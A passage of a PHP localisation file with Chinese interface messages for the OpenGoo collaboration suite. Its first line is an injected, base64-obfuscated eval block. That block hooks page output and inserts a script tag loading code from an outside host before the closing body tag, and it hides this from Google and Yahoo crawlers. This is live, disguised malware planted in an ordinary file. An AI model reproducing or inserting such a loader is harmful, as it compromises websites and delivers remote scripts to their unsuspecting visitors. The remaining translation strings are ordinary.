<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php

  /**
  * Array of messages file (error, success message, status...)
  *
  * @version 1.0
  * @author Ilija Studen <ilija.studen@gmail.com>
  */

  return array(
  
    // Empty, dnx et
    'no mail accounts set' => '没有进行发送电子邮件帐户，请首先创建一个电子邮件帐户。',
    'no mail accounts set for check' => '你没有电子邮件帐户，请首先创建一个电子邮件帐户。',
    'email dnx' => '请求的电子邮件不存在。',
  	'email dnx 已删除' => '请求的电子邮件已经被从数据库中删除',
    'project dnx' => '请求的工作区在数据库中不存在',
    'contact dnx' => '请求的联系人在数据库中不存在',
    'company dnx' => '请求的公司在数据库中不存在',
    'billing category dnx' => '请求薪酬种类在数据库中不存在',

    'message dnx' => '请求的笔记不存在',
    'no comments in message' => '在此笔记上没有评论',
    'no comments associated with object' => '这个对象上没有发布的评论',
    'no messages in project' => '此工作区中没有笔记',
    'no subscribers' => '此对象没有订阅的用户',
    'no activities in project' => '此工作区没有活动记录',
    'comment dnx' => '请求笔记不存在',
    'milestone dnx' => '请求里程碑不存在',
    'task list dnx' => '请求任务列表不存在',
    'task dnx' => '请求任务不存在',
    'event type dnx' => '请求事件类型不存在',
    'no milestones in project' => '此工作区里没有里程碑',
    'no active milestones in project' => '此工作区里没有活动里程碑',
    'empty milestone' => '此里程碑为空。你可以随时在里面添加一个<a class="internalLink" href="{1}">任务</a>',
    'no logs for project' => '没有关联到此工作区的日志记录',
    'no recent activities' => '在数据库中没有记录的近期活动',
    'no open task lists in project' => '此工作区中没有打开的任务',
    'no completed task lists in project' => '此工作区中没有完成的任务',
    'no open task in task list' => '此列表中没有打开的任务',
    'no closed task in task list' => '此列表中没有关闭的任务',
    'no open task in milestone' => '此里程碑中没有打开的任务',
    'no closed task in milestone' => '此里程碑中没有关闭的任务',
    'no projects in db' => '数据库中没有定义的工作区',
    'no projects owned by company' => '没有此公司所属的工作区',
    'no projects started' => '没有启动的工作区',
    'no active projects in db' => '没有活动的工作区',
    'no new objects in project since last visit' => '自从你上次访问以来此工作区中没有新对象',
    'no clients in company' => '你的公司没有任何注册的客户',
    'no users in company' => '此公司没有用户',
    'client dnx' => '选择的客户公司不存在',
    'company dnx' => '选择的公司不存在',
    'user dnx' => '请求的用户在数据库中不存在',
    'avatar dnx' => '肖像不存在',
    'no current avatar' => '肖像没有上载',
    'picture dnx' => '图片不存在',
    'no current picture' => '图片没有上载',
    'no current logo' => '标志没有上载',
    'user not on project' => '选择的用户没有包含在选择的工作区',
    'company not on project' => '选择的公司没有包含在选择的工作区中',
    'user cant be removed from project' => '选择的用户不能被从工作区中移除',
    'tag dnx' => '请求的标签不存在',
    'no tags used on projects' => '本工作区没有标签被使用',
    'no forms in project' => '此工作区中没有表单',
    'project form dnx' => '请求的工作区在数据库中不存在',
    'related project form object dnx' => '关联表单对象在数据库中不存在',
    'no my tasks' => '没有任务指派给你',
    'no search result for' => '没有对象匹配"<strong>{0}</strong>"',
    'no files on the page' => '本页没有文件',
    'folder dnx' => '你请求的文件夹在数据库中不存在',
    'define project folders' => '此工作区中没有文件夹。为了继续，请定义文件夹',
    'file dnx' => '请求的文件在数据库中不存在',
    'not s5 presentation' => '不能启动幻灯放映，因为此文件不是一个有效的S5幻灯片',
    'file not selected' => '没有选择的文件',
    'file revision dnx' => '请求的版本在数据库中不存在',
    'no file revisions in file' => '无效文件－没有关联的版本',
    'cant delete only revision' => '你不能删除这个版本。每个文件需要有一个版本被发布',
    'config category dnx' => '你请求的配置分类不存在',
    'config category is empty' => '选择的配置分类是空的',
    'email address not in use' => '{0} 未被使用',
    'no linked objects' => '没有对象关联到此对象',
    'object not linked object' => '在选择的对象间没有关联',
    'no objects to link' => '请选择需要被关联的对象',
    'no administration tools' => '在数据库中没有被注册的超级管理员工具',
    'administration tool dnx' => '超级管理员工具"{0}"不存在',
    
    // Success
    'success add contact' => '联系人 \'{0}\' 被成功创建',
    'success edit contact' => '联系人 \'{0}\' 被成功更新',
    'success delete contact' => '联系人 \'{0}\' 被成功删除',
    'success edit picture' => '图片被成功更新',
    'success delete picture' => '图片被成功删除',
    
    'success add project' => '工作区 {0} 添加成功',
    'success edit project' => '工作区 {0} 已被更新',
    'success delete project' => '工作区 {0} 已被删除、',
    'success complete project' => '工作区 {0} 已被完成',
    'success open project' => '工作区 {0} 已被重新打开',
    
    'success add milestone' => '里程碑 \'{0}\' 被成功创建',
    'success edit milestone' => '里程碑 \'{0}\' 被成功更新',
    'success deleted milestone' => '里程碑 \'{0}\' 被成功删除',
    
    'success add message' => '笔记 {0} 被成功添加',
    'success edit message' => '笔记 {0} 被成功更新',
    'success deleted message' => '笔记 \'{0}\' 和所有它的评论被成功删除',
    
    'success add comment' => '评论已发布成功',
    'success edit comment' => '评论已更新成功',
    'success delete comment' => '评论已删除成功',
    
    'success add task list' => '任务 \'{0}\' 已被添加',
    'success edit task list' => '任务 \'{0}\' 已被更新',
    'success delete task list' => '任务 \'{0}\' 已被删除',
    
    'success add task' => '选择的任务已被添加',
    'success edit task' => '选择的任务已被更新',
    'success delete task' => '选择的任务已被删除',
    'success complete task' => '选择的任务已被完成',
    'success open task' => '选择的任务已被重新打开、',
    'success n tasks updated' => '{0} 个任务已更新',
	'success add mail' => '电子邮件发送成功',
    
    'success add client' => '客户公司 {0} 已被添加',
    'success edit client' => '客户公司 {0} 已被更新',
    'success delete client' => '客户公司 {0} 已被删除',
    
    'success add group' => '组 {0} 已被添加',
    'success edit group' => '组 {0} 已被更新',
    'success delete group' => '组 {0} 已被删除',
    
    'success edit company' => '公司数据已被更新',
    'success edit company logo' => '公司标志已被更新',
    'success delete company logo' => '公司标志已被删除',
    
    'success add user' => '用户 {0} 已被成功添加',
    'success edit user' => '用户 {0} 已被成功更新',
    'success delete user' => '用户 {0} 已被成功删除',
    
    'success update project permissions' => '工作区权限被成功更新',
    'success remove user from project' => '用户被成功从工作区删除',
    'success remove company from project' => '公司被成功从工作区删除',
    
    'success update profile' => '配置文件已被更新',
    'success edit avatar' => '肖像已被成功更新',
    'success delete avatar' => '肖像已被成功删除',
    
    'success hide welcome info' => '欢迎信息框被成功隐藏',
    
    'success complete milestone' => '里程碑 \'{0}\' 已被完成',
    'success open milestone' => '里程碑 \'{0}\' 已被重打开',
    
    'success subscribe to object' => '你已经成功订阅了此对象',
    'success unsubscribe to object' => '你已经成功取消订阅此对象',
    
    'success add project form' => '表单 \'{0}\' 已被添加',
    'success edit project form' => '表单 \'{0}\' 已被更新',
    'success delete project form' => '表单 \'{0}\' 已被删除',
    
    'success add folder' => '文件夹 \'{0}\' 已被添加',
    'success edit folder' => '文件夹 \'{0}\' 已被更新',
    'success delete folder' => '文件夹 \'{0}\' 已被删除',
    
    'success add file' => '文件 \'{0}\' 已被添加',
	'success save file' => '文件 \'{0}\' 已被保存',
    'success edit file' => '文件 \'{0}\' 已被更新',
    'success delete file' => '文件 \'{0}\' 已被删除',
    'success delete files' => '{0} 个文件 已被删除',
    'success tag files' => '{0} 个文件  已被标记',
    'success tag contacts' => '{0} 个联系人 已被标记',
    
    'success add handis' => '"插件?"已被更新',
    
    'success add properties' => '属性已被更新',
    
    'success edit file revision' => '版本 已被更新',
    'success delete file revision' => '文件版本 已被删除',
    
    'success link objects' => '{0} 个对象 已被成功关联',
    'success unlink object' => '对象 已被成功取消关联',
    
    'success update config category' => '{0} 配置参数 已更新',
    'success forgot password' => '你的密码已经发到你的邮箱',
    
    'success test mail settings' => '测试邮件已被成功发送',
    'success massmail' => '电子邮件已发送',
    
    'success update company permissions' => '公司权限已被成功更新。 {0} 个记录被更新',
    'success user permissions 已更新' => '用户权限 已更新',
  
      'success add event' => '事件 已添加',
    'success edit event' => '事件 已被更新',
    'success delete event' => '事件 已被删除',
    
    'success add event type' => '事件类型 已添加',
    'success delete event type' => '事件类型 已被删除',
    
    'success add webpage' => '网站链接 已添加',
    'success edit webpage' => '网站链接 已被更新',
    'success deleted webpage' => '网站链接 已被删除',
    
    'success add chart' => '图表 已添加',
    'success edit chart' => '图表 已被更新',
    'success delete chart' => '图表 已被删除',
    'success delete charts' => '选择的图表 已被成功删除',
  
    'success delete contacts' => '选择的图表 已被成功删除',
  
    'success classify email' => '邮件分类成功',
    'success delete email' => '电子邮件 已被删除',
  
    'success delete mail account' => '电子邮件帐户 已被成功删除 ',
    'success add mail account' => '电子邮件帐户 已被成功创建',
    'success edit mail account' => '电子邮件帐户 已被成功更新',
  
    'success link object' => '对象已被成功关联',
  
  	'success check mail' => '邮件接收完成: 收到 {0} 个邮件',
  
	'success delete objects' => '{0} 个对象 被成功删除',
	'success tag objects' => '{0} 个对象 被成功标记',
	'error delete objects' => '删除 {0} 个对象失败',
	'error tag objects' => '标记 {0} 个对象失败',
	'success move objects' => '{0} 个对象成功移动',
	'error move objects' => '移动 {0} 个对象失败',
  
    'success checkout file' => '文件检出成功',
    'success checkin file' => '文件检入成功',
  	'success undo checkout file' => '文件取消检出成功',
	'success extracting files' => '{0} 个文件被解开',
	'success compressing files' => '文件压缩成功',
  
	'success add billing category' => '薪酬种类成功添加',
	'success delete billing category' => '薪酬种类成功删除',
	'success edit billing category' => '薪酬种类成功更新',
  	'success assign user billing categories' => '薪酬种类已被成功指派给用户',
    
    // Failures
    'error edit timeslot' => '保存时段失败',
  	'error delete timeslot' => '删除选择的时段失败',
  	'error add timeslot' => '添加时段失败',
  	'error open timeslot' => '打开时段失败',
  	'error close timeslot' => '关闭时段失败',
    'error start time after end time' => '保存时段失败: 开始时间必须在结束时间之前',
    'error form validation' => '保存对象失败，因为它的一些属性无效',
    'error delete owner company' => '我的公司不能被删除',
    'error delete message' => '删除选择的笔记失败',
    'error update message options' => '更新笔记选现失败',
    'error delete comment' => '删除评论失败',
    'error delete milestone' => '删除选择的里程碑失败',
    'error complete task' => '完成选择的任务失败',
    'error open task' => '重打开选择的任务失败',
    'error upload file' => '上载文件失败',
    'error delete project' => '删除选择的工作区失败',
    'error complete project' => '完成选择的工作区失败',
    'error open project' => '重打开选择的工作区失败',
    'error delete client' => '删除客户公司失败',
    'error delete group' => '删除选择的组失败',
    'error delete user' => '删除选择的用户失败',
    'error update project permissions' => '更新工作区失败',
    'error remove user from project' => '从工作区移除用户失败',
    'error remove company from project' => '从工作区移除公司失败',
    'error edit avatar' => '编辑肖像失败',
    'error delete avatar' => '删除肖像失败',
    'error edit picture' => '编辑图片失败',
    'error delete picture' => '删除图片失败',
    'error edit contact' => '编辑联系人失败',
    'error delete contact' => '删除联系人失败',
    'error hide welcome info' => '隐藏欢迎信息失败',
    'error complete milestone' => '完成选择的里程碑失败',
    'error open milestone' => '重打开选择的里程碑失败',
    'error file download' => '下载指定的文件失败',
    'error link object' => '关联对象失败',
    'error edit company logo' => '更新公司标志失败',
    'error delete company logo' => '删除公司标志失败',
    'error subscribe to object' => '订阅到选定对象失败',
    'error unsubscribe to object' => '取消订阅到选定对象失败',
    'error add project form' => '添加工作区表单失败',
    'error submit project form' => '提交工作区表单失败',
    'error delete folder' => '删除选定文件夹失败',
    'error delete file' => '删除选定文件失败',
    'error delete files' => '删除 {0} 个文件失败',
    'error tag files' => '标记 {0} 个文件失败',
    'error tag contacts' => '标记 {0} 个联系人失败',
    'error delete file revision' => '删除文件版本失败',
    'error delete task list' => '删除选定任务列表失败',
    'error delete task' => '删除选定任务失败',
    'error check for upgrade' => '检测新版本失败',
    'error link object' => '关联对象失败',
    'error unlink object' => '取消关联 {0}个 对象失败',
    'error link objects max controls' => '你不能添加更多的对象关联，上限是 {0}',
    'error test mail settings' => '发送测试邮件失败',
    'error massmail' => '发送邮件失败',
    'error owner company has all permissions' => '我的公司有全部权限',
    'error while saving' => '保存文档时发生错误',
    'error delete event type' =>'删除事件类型失败',
    'error delete mail' => '删除此邮件发生错误',
    'error delete mail account' => '删除此邮件帐户发生错误',
    'error delete contacts' => '删除这些联系人错误',
  	'error check mail' => '检测帐号 \'{0}\': {1} 邮件错误',
  	'error check out file' => '为了独占使用检出文件错误',
    'error checkin file' => '检入文件错误',
    'error classifying attachment cant open file' => '分类附件错误：不能打开文件',
  	'error contact added but not assigned' => '联系人 \'{0}\' 已被添加，但是指派到工作区\'{1}\'不成功，请检查访问权限',
  	'error cannot set workspace as parent' => '不能设置工作区 \'{0}\' 为父亲, 太多工作区级别或者循环引用',
  
    
    // Access or data errors
    'no access permissions' => '你没有权限访问请求页面',
    'invalid request' => '无效请求!',
    
    // Confirmation
    'confirm delete billing category' => "你是否确认删除选定的薪酬种类?",
    'confirm cancel work timeslot' => "你是否确认想要中止当前时段?",
    'confirm delete mail account' => '警告：所有此帐户的邮件将被全部删除，你是否确认想要删除此邮件帐户?',
    'confirm delete message' => '你是否确认想要删除此笔记?',
    'confirm delete milestone' => '你是否确认想要删除此里程碑?',
    'confirm delete task list' => '你是否确认想要删除此任务和它所有的子任务?',
    'confirm delete task' => '你是否确认想要删除此任务?',
    'confirm delete comment' => '你是否确认想要删除此评论?',
    'confirm delete project' => '你是否确认想要删除此工作区和所有相关数据（笔记、任务、里程碑、文件等等）?',
    'confirm complete project' => '你是否确认想要标记此工作区为关闭?工作区所有动作将被锁定。',
    'confirm open project' => '你是否确认想要标记此工作区为打开，将会解锁工作区的所有动作。',
    'confirm delete client' => '你是否确认想要删除选择的客户公司和它的所有用户?\n这个动作也删除用户的个人工作区。',
    'confirm delete contact' => '你是否确认想要删除选定的联系人?',
    'confirm delete user' => '你是否确认想要删除此用户帐户?\n这个动作也删除用户的个人工作区。',
    'confirm reset people form' => '你是否确认想要重置此表单? 所有编辑过的数据将丢失!',
    'confirm remove user from project' => '你是否确认想要从此工作区移除这个用户?',
    'confirm remove company from project' => '你是否确认想要从此工作区移除这个公司?',
    'confirm logout' => '你是否确认想要登出?',
    'confirm delete current avatar' => '你是否确认想要删除此肖像?',
    'confirm unlink object' => '你是否确认想要取消关联此对象?',
    'confirm delete company logo' => '你是否确认想要删除此标志?',
    'confirm subscribe' => '你是否确认想要订阅此对象?你将在任何人对它提交评论时接收到一个电子邮件。',
    'confirm unsubscribe' => '你是否确认想要取消订阅?',
    'confirm delete project form' => '你是否确认想要删除此表单?',
    'confirm delete folder' => '你是否确认想要删除此文件夹?',
    'confirm delete file' => '你是否确认想要删除此文件?',
    'confirm delete revision' => '你是否确认想要删除此版本?',
    'confirm reset form' => '你是否确认想要重置此表单?',
    'confirm delete contacts' => '你是否确认想要删除这些联系人?',
	'confirm delete group' => '你是否确认想要删除此组?',
    
    // Errors...
    'system error message' => '非常抱歉，但是一个严重失败阻碍了Opengoo执行你的请求。一个错误报告已被发送给系统管理员。',
    'execute action error message' => '非常抱歉，但是Opengoo当前不能执行你的请求。一个错误报告已被发送给系统管理员。',
    
    // Log
    'log add projectmessages' => '\'{0}\' 已添加',
    'log edit projectmessages' => '\'{0}\' 已更新',
    'log delete projectmessages' => '\'{0}\' 已删除',
  	'log trash projectmessages' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash projectmessages' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment projectmessages' => '评论在 \'{0}\'上',
  	'log subscribe projectmessages' => '订阅到 \'{0}\'',
  	'log unsubscribe projectmessages' => '取消订阅到 \'{0}\'',
    'log tag projectmessages' => '\'{0}\' 已标记',
    'log link projectmessages' => '\'{0}\' 已关联',
    'log unlink projectmessages' => '\'{0}\' 已取消关联',
    'log tag projectmessages data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projectmessages data' => '\'{0}\' 关联到 {1}',
    'log unlink projectmessages data' => '\'{0}\' 取消关联从 {1}',
  
  
  	'log add projectevents' => '\'{0}\' 已添加',
    'log edit projectevents' => '\'{0}\' 已更新',
    'log delete projectevents' => '\'{0}\' 已删除',
  	'log trash projectevents' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash projectevents' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment projectevents' => '评论在 \'{0}\'上',
  	'log subscribe projectevents' => '订阅到 \'{0}\'',
  	'log unsubscribe projectevents' => '取消订阅到\'{0}\'',
    'log tag projectevents' => '\'{0}\' 已标记',
    'log link projectevents' => '\'{0}\' 已关联',
    'log unlink projectevents' => '\'{0}\' 已取消关联',
    'log tag projectevents data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projectevents data' => '\'{0}\' 关联到 {1}',
    'log unlink projectevents data' => '\'{0}\' 取消关联从  {1}',
    
    'log add comments' => '{0} 已添加',
    'log edit comments' => '{0} 已更新',
    'log delete comments' => '{0} 已删除',
  	'log trash comments' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash comments' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment comments' => '评论在 \'{0}\'上',
  	'log subscribe comments' => '订阅到 \'{0}\'',
  	'log unsubscribe comments' => '取消订阅到\'{0}\'',
    'log tag comments' => '\'{0}\' 已标记',
    'log link comments' => '\'{0}\' 已关联',
    'log unlink comments' => '\'{0}\' 已取消关联',
    'log tag comments data' => '\'{0}\' 标记为 \'{1}\'',
    'log link comments data' => '\'{0}\' 关联到 {1}',
    'log unlink comments data' => '\'{0}\' 取消关联从  {1}',
    
    'log add projectmilestones' => '\'{0}\' 已添加',
    'log edit projectmilestones' => '\'{0}\' 已更新',
    'log delete projectmilestones' => '\'{0}\' 已删除',
    'log close projectmilestones' => '\'{0}\' 已完成',
    'log open projectmilestones' => '\'{0}\' 已重新打开',
  	'log trash projectmilestones' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash projectmilestones' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment projectmilestones' => '评论在 \'{0}\'上',
  	'log subscribe projectmilestones' => '订阅到 \'{0}\'',
  	'log unsubscribe projectmilestones' => '取消订阅到\'{0}\'',
    'log tag projectmilestones' => '\'{0}\' 已标记',
    'log link projectmilestones' => '\'{0}\' 已关联',
    'log unlink projectmilestones' => '\'{0}\' 已取消关联',
    'log tag projectmilestones data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projectmilestones data' => '\'{0}\' 关联到 {1}',
    'log unlink projectmilestones data' => '\'{0}\' 取消关联从  {1}',
    
    'log add projecttasklists' => '\'{0}\' 已添加',
    'log edit projecttasklists' => '\'{0}\' 已更新',
    'log delete projecttasklists' => '\'{0}\' 已删除',
    'log close projecttasklists' => '\'{0}\' 已关闭',
    'log open projecttasklists' => '\'{0}\' 已打开',
  	'log trash projecttasklists' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash projecttasklists' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment projecttasklists' => '评论在 \'{0}\'上',
  	'log subscribe projecttasklists' => '订阅到 \'{0}\'',
  	'log unsubscribe projecttasklists' => '取消订阅到\'{0}\'',
    'log tag projecttasklists' => '\'{0}\' 已标记',
    'log link projecttasklists' => '\'{0}\' 已关联',
    'log unlink projecttasklists' => '\'{0}\' 已取消关联',
    'log tag projecttasklists data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projecttasklists data' => '\'{0}\' 关联到 {1}',
    'log unlink projecttasklists data' => '\'{0}\' 取消关联从  {1}',
    
    'log add projecttasks' => '\'{0}\' 已添加',
    'log edit projecttasks' => '\'{0}\' 已更新',
    'log delete projecttasks' => '\'{0}\' 已删除',
    'log close projecttasks' => '\'{0}\' 已关闭',
    'log open projecttasks' => '\'{0}\' 已打开',
  	'log trash projecttasks' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash projecttasks' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment projecttasks' => '评论在 \'{0}\'上',
  	'log subscribe projecttasks' => '订阅到 \'{0}\'',
  	'log unsubscribe projecttasks' => '取消订阅到\'{0}\'',
    'log tag projecttasks' => '\'{0}\' 已标记',
    'log link projecttasks' => '\'{0}\' 已关联',
    'log unlink projecttasks' => '\'{0}\' 已取消关联',
    'log tag projecttasks data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projecttasks data' => '\'{0}\' 关联到 {1}',
    'log unlink projecttasks data' => '\'{0}\' 取消关联从  {1}',
    
    'log add projectforms' => '\'{0}\' 已添加',
    'log edit projectforms' => '\'{0}\' 已更新',
    'log delete projectforms' => '\'{0}\' 已删除',
  	'log trash projectforms' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash projectforms' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment projectforms' => '评论在 \'{0}\'上',
  	'log subscribe projectforms' => '订阅到 \'{0}\'',
  	'log unsubscribe projectforms' => '取消订阅到\'{0}\'',
    'log tag projectforms' => '\'{0}\' 已标记',
    'log link projectforms' => '\'{0}\' 已关联',
    'log unlink projectforms' => '\'{0}\' 已取消关联',
    'log tag projectforms data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projectforms data' => '\'{0}\' 关联到 {1}',
    'log unlink projectforms data' => '\'{0}\' 取消关联从  {1}',
    
    'log add projectfolders' => '\'{0}\' 已添加',
    'log edit projectfolders' => '\'{0}\' 已更新',
    'log delete projectfolders' => '\'{0}\' 已删除',
  	'log comment projectfolders' => '评论在 \'{0}\'上',
  	'log subscribe projectfolders' => '订阅到 \'{0}\'',
  	'log unsubscribe projectfolders' => '取消订阅到\'{0}\'',
    'log tag projectfolders' => '\'{0}\' 已标记',
    'log link projectfolders' => '\'{0}\' 已关联',
    'log unlink projectfolders' => '\'{0}\' 已取消关联',
    'log tag projectfolders data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projectfolders data' => '\'{0}\' 关联到 {1}',
    'log unlink projectfolders data' => '\'{0}\' 取消关联从  {1}',
    
    'log add projectfiles' => '\'{0}\' 已上载',
    'log edit projectfiles' => '\'{0}\' 已更新',
    'log delete projectfiles' => '\'{0}\' 已删除',
  	'log trash projectfiles' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash projectfiles' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment projectfiles' => '评论在 \'{0}\'上',
  	'log subscribe projectfiles' => '订阅到 \'{0}\'',
  	'log unsubscribe projectfiles' => '取消订阅到\'{0}\'',
    'log tag projectfiles' => '\'{0}\' 已标记',
    'log link projectfiles' => '\'{0}\' 已关联',
    'log unlink projectfiles' => '\'{0}\' 已取消关联',
    'log tag projectfiles data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projectfiles data' => '\'{0}\' 关联到 {1}',
    'log unlink projectfiles data' => '\'{0}\' 取消关联从  {1}',
    
    'log edit projectfilerevisions' => '{0} 已更新',
    'log delete projectfilerevisions' => '{0} 已删除',
  	'log trash projectfilerevisions' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash projectfilerevisions' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment projectfilerevisions' => '评论在 \'{0}\'上',
  	'log subscribe projectfilerevisions' => '订阅到 \'{0}\'',
  	'log unsubscribe projectfilerevisions' => '取消订阅到\'{0}\'',
    'log tag projectfilerevisions' => '\'{0}\' 已标记',
    'log link projectfilerevisions' => '\'{0}\' 已关联',
    'log unlink projectfilerevisions' => '\'{0}\' 已取消关联',
    'log tag projectfilerevisions data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projectfilerevisions data' => '\'{0}\' 关联到 {1}',
    'log unlink projectfilerevisions data' => '\'{0}\' 取消关联从  {1}',
    
    'log add projectwebpages' => '\'{0}\' 已添加',
    'log edit projectwebpages' => '\'{0}\' 已更新',
    'log delete projectwebpages' => '\'{0}\' 已删除',
  	'log trash projectwebpages' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash projectwebpages' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment projectwebpages' => '评论在 \'{0}\'上',
  	'log subscribe projectwebpages' => '订阅到 \'{0}\'',
  	'log unsubscribe projectwebpages' => '取消订阅到\'{0}\'',
    'log tag projectwebpages' => '\'{0}\' 已标记',
    'log link projectwebpages' => '\'{0}\' 已关联',
    'log unlink projectwebpages' => '\'{0}\' 已取消关联',
    'log tag projectwebpages data' => '\'{0}\' 标记为 \'{1}\'',
    'log link projectwebpages data' => '\'{0}\' 关联到 {1}',
